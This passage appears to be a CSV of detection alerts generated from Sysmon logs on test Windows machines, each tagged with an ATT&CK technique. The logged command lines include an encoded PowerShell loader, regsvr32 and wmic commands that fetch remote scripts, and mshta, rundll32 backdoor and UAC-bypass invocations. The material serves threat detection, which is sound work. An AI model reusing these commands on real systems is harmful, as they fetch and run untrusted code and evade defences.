QB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1584766825.224263,2020-03-21T09:00:25.224263+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," 1 5 4 1 0 0x8000000000000000 243540 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 05:00:25.029 747F3D96-9F69-5E75-0000-0010946B2000 1828 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 windowscoredeviceinfo.dll,CreateBackdoor C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-9DBA-5E75-0000-0020E7030000 0x3e7 0 System SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-9DBC-5E75-0000-00102C390100 1652 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational Prohibited Process connecting to internet,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\regsvr32.exe and initiated network connection from hostname ( IEWIN7..home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 104.20.208.21 ) and port ( 80 )",3," 3 5 4 3 0 0x8000000000000000 16794 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-12 18:35:04.463 365ABB72-6759-5CD8-0000-0010E2D50F00 1420 C:\Windows\System32\regsvr32.exe IEWIN7\IEUser tcp true false 10.0.2.15 IEWIN7..home 49165 false 104.20.208.21 80 http ",IEWIN7,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.224263,2020-03-21T09:00:25.224263+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," 1 5 4 1 0 0x8000000000000000 243540 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 05:00:25.029 747F3D96-9F69-5E75-0000-0010946B2000 1828 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 windowscoredeviceinfo.dll,CreateBackdoor C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-9DBA-5E75-0000-0020E7030000 0x3e7 0 System SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-9DBC-5E75-0000-00102C390100 1652 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [ T1218.005 ] Mshta found running in the system,1560582824.106609,2019-06-15T11:13:44.106609+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line ("C:\Windows\System32\mshta.exe" "C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta") and Parent Image :C:\Program Files\Internet Explorer\iexplore.exe , Parent CommandLine ("C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\IEUser\Downloads\update.html) in directory : ( C:\Users\IEUser\Desktop\ )",1," 1 5 4 1 0 0x8000000000000000 7648 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-06-15 07:13:42.278 365ABB72-9AA6-5D04-0000-00109C850F00 652 C:\Windows\System32\mshta.exe 11.00.9600.16428 (winblue_gdr.131013-1700) Microsoft (R) HTML Application host Internet Explorer Microsoft Corporation "C:\Windows\System32\mshta.exe" "C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta" C:\Users\IEUser\Desktop\ IEWIN7\IEUser 365ABB72-98E4-5D04-0000-0020A4350100 0x135a4 1 High SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A 365ABB72-9972-5D04-0000-0010F0490C00 3660 C:\Program Files\Internet Explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\IEUser\Downloads\update.html ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\cmd.exe ) through command line ( cmd /c ping 127.0.0.1&&del del /F /Q /A:H "C:\Users\IEUser\AppData\Roaming\wwlib.dll" ),1," 1 5 4 1 0 0x8000000000000000 417085 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-10-17 11:43:49.217 747F3D96-D8F5-5F8A-0000-00106B6F7300 1680 C:\Windows\SysWOW64\cmd.exe 10.0.17763.592 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe cmd /c ping 127.0.0.1&&del del /F /Q /A:H "C:\Users\IEUser\AppData\Roaming\wwlib.dll" C:\Users\IEUser\AppData\Roaming\ MSEDGEWIN10\IEUser 747F3D96-CA8D-5F8A-0000-0020D1090A00 0xa09d1 1 High SHA1=E2EAD0993B917E1828A658ADA0B87E01D5B8424F,MD5=C43699F84A68608E7E57C43B7761BBB8,SHA256=2EDB180274A51C83DDF8414D99E90315A9047B18C51DFD070326214D4DA59651,IMPHASH=392B4D61B1D1DADC1F06444DF258188A 747F3D96-D8E5-5F8A-0000-0010E1BC7200 2920 C:\Users\IEUser\AppData\Roaming\WINWORD.exe C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1564436008.374373,2019-07-30T01:33:28.374373+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll ),1," 1 5 4 1 0 0x8000000000000000 4916 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:33:28.197 747F3D96-6628-5D3F-0000-001067768800 1296 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-6609-5D3F-0000-00109FBF8500 1208 C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1085] Rundll32 Execution detected,1584766825.224263,2020-03-21T09:00:25.224263+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," 1 5 4 1 0 0x8000000000000000 243540 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 05:00:25.029 747F3D96-9F69-5E75-0000-0010946B2000 1828 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 windowscoredeviceinfo.dll,CreateBackdoor C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-9DBA-5E75-0000-0020E7030000 0x3e7 0 System SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-9DBC-5E75-0000-00102C390100 1652 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [ T0000 ] Suspicious process name detected,1560582824.106609,2019-06-15T11:13:44.106609+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( "C:\Windows\System32\mshta.exe" "C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta" ) contain suspicious command ( \mshta.exe),1," 1 5 4 1 0 0x8000000000000000 7648 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-06-15 07:13:42.278 365ABB72-9AA6-5D04-0000-00109C850F00 652 C:\Windows\System32\mshta.exe 11.00.9600.16428 (winblue_gdr.131013-1700) Microsoft (R) HTML Application host Internet Explorer Microsoft Corporation "C:\Windows\System32\mshta.exe" "C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta" C:\Users\IEUser\Desktop\ IEWIN7\IEUser 365ABB72-98E4-5D04-0000-0020A4350100 0x135a4 1 High SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A 365ABB72-9972-5D04-0000-0010F0490C00 3660 C:\Program Files\Internet Explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\IEUser\Downloads\update.html ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1088] Bypass User Account Control - Process,1555606626.954307,2019-04-18T20:57:06.954307+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\mmc.exe ) through command line ( "C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" ),1," 1 5 4 1 0 0x8000000000000000 15 Microsoft-Windows-Sysmon/Operational IEWIN7 technique_id=T1088,technique_name=Bypass User Account Control 2019-04-18 16:57:04.500 365ABB72-AC60-5CB8-0000-001037BA0800 3900 C:\Windows\System32\mmc.exe 6.1.7600.16385 (win7_rtm.090713-1255) Microsoft Management Console Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" C:\Users\IEUser\ IEWIN7\IEUser 365ABB72-AB27-5CB8-0000-002021CA0000 0xca21 1 High SHA1=98D8C5E38510C6220F42747D15F6FFF75DD59845,MD5=A2A5D487D0C3D55739A0491B6872480D,SHA256=40E2B83F07771D54CE4E45B76A14883D042766FF4E1E7872E482EC91E81E9484,IMPHASH=6D2ED4ADDAC7EBAE62381320D82AC4C1 365ABB72-AC60-5CB8-0000-001002B30800 3904 C:\Windows\System32\eventvwr.exe "C:\Windows\system32\eventvwr.exe" ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1170] Detecting Mshta,1560582824.106609,2019-06-15T11:13:44.106609+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line ("C:\Windows\System32\mshta.exe" "C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta") and Parent Image :C:\Program Files\Internet Explorer\iexplore.exe , Parent CommandLine ("C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\IEUser\Downloads\update.html) in directory : ( C:\Users\IEUser\Desktop\ )",1," 1 5 4 1 0 0x8000000000000000 7648 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-06-15 07:13:42.278 365ABB72-9AA6-5D04-0000-00109C850F00 652 C:\Windows\System32\mshta.exe 11.00.9600.16428 (winblue_gdr.131013-1700) Microsoft (R) HTML Application host Internet Explorer Microsoft Corporation "C:\Windows\System32\mshta.exe" "C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta" C:\Users\IEUser\Desktop\ IEWIN7\IEUser 365ABB72-98E4-5D04-0000-0020A4350100 0x135a4 1 High SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A 365ABB72-9972-5D04-0000-0010F0490C00 3660 C:\Program Files\Internet Explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\IEUser\Downloads\update.html ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1558920558.121924,2019-05-27T05:29:18.121924+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.username ),1," 1 5 4 1 0 0x8000000000000000 5913 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 01:29:18.081 365ABB72-3D6E-5CEB-0000-00100C87FF00 2896 C:\Windows\System32\inetsrv\appcmd.exe 7.5.7600.16385 (win7_rtm.090713-1255) Application Server Command Line Admin Tool Internet Information Services Microsoft Corporation "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.username C:\Windows\Temp\ IIS APPPOOL\DefaultAppPool 365ABB72-B26B-5CEA-0000-002023240800 0x82423 0 High SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 365ABB72-3D4A-5CEB-0000-0010FA93FD00 2584 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1047] Windows Management Instrumentation - Process,1558630145.862062,2019-05-23T20:49:05.862062+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( wmic process list /format:"https://a.uguu.se/x50IGVBRfr55_test.xsl" ),1," 1 5 4 1 0 0x8000000000000000 892 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-23 16:49:05.686 365ABB72-CF01-5CE6-0000-00105DA50C00 3872 C:\Windows\System32\wbem\WMIC.exe 6.1.7600.16385 (win7_rtm.090713-1255) WMI Commandline Utility Microsoft® Windows® Operating System Microsoft Corporation wmic process list /format:"https://a.uguu.se/x50IGVBRfr55_test.xsl" c:\ IEWIN7\IEUser 365ABB72-CE6C-5CE6-0000-002047F30000 0xf347 1 High SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443 365ABB72-CE84-5CE6-0000-001094130600 2940 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1117] Regsvr32,1557686106.562199,2019-05-12T22:35:06.562199+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" ),1," 1 5 4 1 0 0x8000000000000000 16793 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-12 18:35:05.765 365ABB72-6759-5CD8-0000-001085031000 1912 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\System32\cmd.exe" C:\Users\IEUser\ IEWIN7\IEUser 365ABB72-63FC-5CD8-0000-0020EE3E0100 0x13eee 1 Medium SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-6759-5CD8-0000-0010E2D50F00 1420 C:\Windows\System32\regsvr32.exe regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1557686106.562199,2019-05-12T22:35:06.562199+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" ),1," 1 5 4 1 0 0x8000000000000000 16793 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-12 18:35:05.765 365ABB72-6759-5CD8-0000-001085031000 1912 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\System32\cmd.exe" C:\Users\IEUser\ IEWIN7\IEUser 365ABB72-63FC-5CD8-0000-0020EE3E0100 0x13eee 1 Medium SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-6759-5CD8-0000-0010E2D50F00 1420 C:\Windows\System32\regsvr32.exe regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll ",IEWIN7,Microsoft-Windows-Sysmon/Operational Prohibited Process connecting to internet,1564436008.250664,2019-07-30T01:33:28.250664+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3," 3 5 4 3 0 0x8000000000000000 4915 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 Suspicious NetCon 2019-07-29 21:33:24.152 747F3D96-6623-5D3F-0000-0010BC068800 3000 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MSEDGEWIN10\IEUser tcp true false 10.0.2.15 MSEDGEWIN10.home 49828 false 151.101.0.133 443 https ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1082] System Information Discovery,1555606624.681038,2019-04-18T20:57:04.681038+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( "C:\Windows\system32\whoami.exe" /user) ,1," 1 5 4 1 0 0x8000000000000000 14 Microsoft-Windows-Sysmon/Operational IEWIN7 technique_id=T1033,technique_name=System Owner/User Discovery 2019-04-18 16:56:24.833 365ABB72-AC38-5CB8-0000-0010365E0800 3576 C:\Windows\System32\whoami.exe 6.1.7600.16385 (win7_rtm.090713-1255) whoami - displays logged on user information Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\whoami.exe" /user C:\Users\IEUser\Desktop\ IEWIN7\IEUser 365ABB72-AB27-5CB8-0000-002021CA0000 0xca21 1 High SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 365ABB72-AC28-5CB8-0000-0010F3F70700 1200 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell ",IEWIN7,Microsoft-Windows-Sysmon/Operational [ T0000 ] Suspicious process name detected,1555606624.681038,2019-04-18T20:57:04.681038+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( "C:\Windows\system32\whoami.exe" /user ) contain suspicious command ( whoami.exe),1," 1 5 4 1 0 0x8000000000000000 14 Microsoft-Windows-Sysmon/Operational IEWIN7 technique_id=T1033,technique_name=System Owner/User Discovery 2019-04-18 16:56:24.833 365ABB72-AC38-5CB8-0000-0010365E0800 3576 C:\Windows\System32\whoami.exe 6.1.7600.16385 (win7_rtm.090713-1255) whoami - displays logged on user information Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\whoami.exe" /user C:\Users\IEUser\Desktop\ IEWIN7\IEUser 365ABB72-AB27-5CB8-0000-002021CA0000 0xca21 1 High SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 365ABB72-AC28-5CB8-0000-0010F3F70700 1200 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1053] Scheduled Task - Process,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (NT 